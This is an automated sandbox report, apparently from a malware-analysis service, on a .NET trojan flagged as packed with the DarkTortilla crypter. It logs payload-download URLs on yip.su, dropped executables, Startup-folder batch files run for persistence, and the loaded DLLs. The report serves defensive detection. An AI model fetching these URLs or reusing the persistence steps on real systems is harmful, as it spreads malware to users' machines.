                      Source: InstallUtil.exe, 00000003.00000002.3538302079.00000000032F9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003325000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003338000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003348000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003271000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.00000000031ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                      Source: InstallUtil.exe, 00000003.00000002.3538302079.00000000032D3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.000000000336C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003348000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
                      Source: InstallUtil.exe, 00000003.00000002.3538302079.0000000003317000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yip.su
                      Source: InstallUtil.exe, 00000003.00000002.3538302079.000000000331E000.00000004.00000800.00020000.00000000.sdmp, 3BKVENDizermJCmNwCB42ME3.exe.3.dr, lHi4knFRqmK4FFdSjJjLFDSD.exe.3.dr, vQTyYvkkcYOdC3ep2WUufnYJ.exe.3.dr, ya3fW80pEvNY3Pp8eIbfmN8e.exe.3.drString found in binary or memory: https://yip.su/RNWPd
                      Source: InstallUtil.exe, 00000003.00000002.3538302079.00000000031B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yip.su/RNWPd.exe
                      Source: InstallUtil.exe, 00000003.00000002.3538302079.000000000331E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003258000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, 3BKVENDizermJCmNwCB42ME3.exe.3.dr, lHi4knFRqmK4FFdSjJjLFDSD.exe.3.dr, vQTyYvkkcYOdC3ep2WUufnYJ.exe.3.dr, ya3fW80pEvNY3Pp8eIbfmN8e.exe.3.drString found in binary or memory: https://yip.su/redirect-
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                      Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.6:49721 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49722 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.188.178:443 -> 192.168.2.6:49723 version: TLS 1.2
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0918B4C8 CreateProcessAsUserW,0_2_0918B4C8
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D2A3C80_2_00D2A3C8
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D297780_2_00D29778
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DA03680_2_00DA0368
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05E724880_2_05E72488
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05E7A7940_2_05E7A794
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05E724790_2_05E72479
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05E7C3680_2_05E7C368
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0722B6F50_2_0722B6F5
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07221D580_2_07221D58
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0722CC8B0_2_0722CC8B
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0722CC880_2_0722CC88
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0722CC980_2_0722CC98
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0722CCE30_2_0722CCE3
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07311C700_2_07311C70
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0732D3800_2_0732D380
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0732DD500_2_0732DD50
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0732EC600_2_0732EC60
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0732CC580_2_0732CC58
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0732B0480_2_0732B048
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_073210ED0_2_073210ED
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0732FB080_2_0732FB08
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0732EBAA0_2_0732EBAA
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0732BEA00_2_0732BEA0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0732FAF80_2_0732FAF8
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0732C0180_2_0732C018
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_073200060_2_07320006
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_073200400_2_07320040
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0732EC4A0_2_0732EC4A
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0732CC490_2_0732CC49
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_091841000_2_09184100
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_091858680_2_09185868
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0918F3380_2_0918F338
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_09185B700_2_09185B70
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_091867EC0_2_091867EC
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0918BA600_2_0918BA60
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_09180D180_2_09180D18
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_09180D080_2_09180D08
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_091885080_2_09188508
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_09189DF80_2_09189DF8
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_091800120_2_09180012
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_091818050_2_09181805
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_091858580_2_09185858
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_091800400_2_09180040
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_091818600_2_09181860
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_091850980_2_09185098
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_091808D80_2_091808D8
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_091884F80_2_091884F8
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_091840F00_2_091840F0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_091808E80_2_091808E8
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_091803300_2_09180330
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_091843900_2_09184390
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_091843A00_2_091843A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_09184A300_2_09184A30
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_091806B00_2_091806B0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_091806A00_2_091806A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_091896C80_2_091896C8
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07311C570_2_07311C57
                      Source: file.exeStatic PE information: invalid certificate
                      Source: file.exe, 00000000.00000002.2649238421.00000000075C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRP8SH.dll, vs file.exe
                      Source: file.exe, 00000000.00000002.2630838739.0000000003107000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNew.exe" vs file.exe
                      Source: file.exe, 00000000.00000002.2640143868.0000000003F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMiPro.dll, vs file.exe
                      Source: file.exe, 00000000.00000002.2628944034.00000000006BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
                      Source: file.exe, 00000000.00000002.2640143868.0000000003DFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMiPro.dll, vs file.exe
                      Source: file.exe, 00000000.00000002.2630838739.0000000002DC8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNew.exe" vs file.exe
                      Source: file.exe, 00000000.00000002.2630838739.0000000002D01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNew.exe" vs file.exe
                      Source: file.exe, 00000000.00000002.2641880996.00000000051C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMiPro.dll, vs file.exe
                      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@28/8@3/3
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.logJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3512:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3380:120:WilError_03
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6520:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5936:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3276:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3576:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5844:120:WilError_03
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Q266LY31DJuBkUgU7rnVY9MU.bat" "
                      Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: file.exeReversingLabs: Detection: 28%
                      Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Q266LY31DJuBkUgU7rnVY9MU.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\N7dCpczI2KMQNpAzS7xasjkw.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uknphp3q7QNTU5S7JDQd395T.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7jqZT4DOBm3RwAn2PcA575yH.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aQqevjV3RV9JJaF7h5x7Exf9.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pltF0lsLekfh4Kak6kjaROUd.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0aZULhs3yjKzrM4jdcsdY0pG.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bPdKjWiyihutETqOInbK2Mh7.bat" "
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: file.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: file.exeStatic file information: File size 9643376 > 1048576
                      Source: file.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x91a600
                      Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Data Obfuscation

                      barindex
                      Yara detected DarkTortilla Crypter
                      Source: Yara matchFile source: 0.2.file.exe.3e60010.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.3eb0030.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.3eb0030.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.51c0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.51c0000.5.raw.unpack, type: UNPACKEDPE
